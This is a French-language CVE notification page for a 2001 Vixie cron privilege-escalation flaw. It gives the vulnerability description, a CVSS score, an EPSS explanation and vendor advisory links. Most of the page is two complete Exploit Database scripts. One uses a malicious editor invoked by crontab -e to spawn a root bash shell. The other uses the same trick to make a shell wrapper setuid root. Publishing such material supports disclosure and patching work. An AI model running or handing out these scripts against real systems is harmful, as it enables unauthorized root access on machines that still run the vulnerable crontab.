Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
crontab in Vixie cron 3.0.1 and earlier does not properly drop privileges after the failed parsing of a modification operation, which could allow a local attacker to gain additional privileges when an editor is called to correct the error.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 20822
Date de publication : 2001-05-06 22h00 +00:00
Auteur : Sebastian Krahmer
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/2687/info
Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.
When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.
This vulnerability may be exploited to gain root privileges locally.
#!/bin/bash
clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is> |"
echo "| Michal Zalewski <lcamtuf@coredump.cx> |"
echo "\`-----------------------------------------------------------'"
echo
test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab
echo ">>> Using binary: $CRONBIN"
echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
echo "PASSED"
else
echo "FAILED"
echo
exit 1
fi
echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
echo "FAILED"
echo
exit 1
else
echo "PASSED"
fi
echo ">>> Building exploit..."
cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
sleep(1);
if (geteuid()) {
FILE* x=fopen(argv[1],"w");
fprintf(x,"blah blah blah\n");
fclose(x);
} else {
dup2(1,0);
dup2(1,2);
printf("\n>>> Entering rootshell, babe...\n");
system("touch $HOME/.xploited");
system("bash");
}
}
_eof_
gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c
if [ ! -f edit0r ]; then
echo ">>> Cannot compile exploit."
echo
exit 1
fi
rm -f ~/.xploited
echo ">>> Performing attack..."
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null
rm -f edit0r
if [ -f ~/.xploited ]; then
echo
echo ">>> Thank you."
rm -f ~/.xploited
echo
exit 0
else
echo
echo ">>> Apparently I am not able to exploit it, sorry..."
echo
exit 1
fi
Exploit Database EDB-ID : 20823
Date de publication : 2001-07-04 22h00 +00:00
Auteur : cairnsc
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/2687/info
Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.
When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.
This vulnerability may be exploited to gain root privileges locally.
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
# the crontab file maintenance program (crontab) fails to drop privileges
# before invoking the editor under certain circumstances.
#
# description:
# a serialization error exists in some versions of the file maintenance
# program, crontab. the vulnerability was introduced in versions which
# were patched for seperate vulnerability in fall of 2000 (see Bugtraq
# ID #1960).
#
# when a parsing error occurs after a modification operation, crontab will
# fail to drop privileges correctly for subsequent modification operations.
# because the program is installed setuid root, it may be possible for a
# local user to gain root privileges.
#
# affected versions:
# cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
# note that copies of the program with the patch mentioned above are likely
# to also be vulnerable.
#
# references:
# https://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com
CRONTAB=/usr/bin/crontab
if ! test -x $CRONTAB; then
echo "** unable to locate crontab executable, exiting"
exit 1
fi
cat > vcsh.c << EOF
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c
if ! test -x $PWD/vcsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
chown root.root $PWD/vcsh
chmod 4755 $PWD/vcsh
rm $PWD/vcboom
else
touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh
echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"
exit 0
Products Mentioned
Configuraton 0
Paul_vixie>>Vixie_cron >> Version To (including) 3.0.1
Références
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-050.php3
Tags : vendor-advisory, x_refsource_MANDRAKE
Tags : vendor-advisory, x_refsource_MANDRAKE
http://www.novell.com/linux/security/advisories/2001_017_cron_txt.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
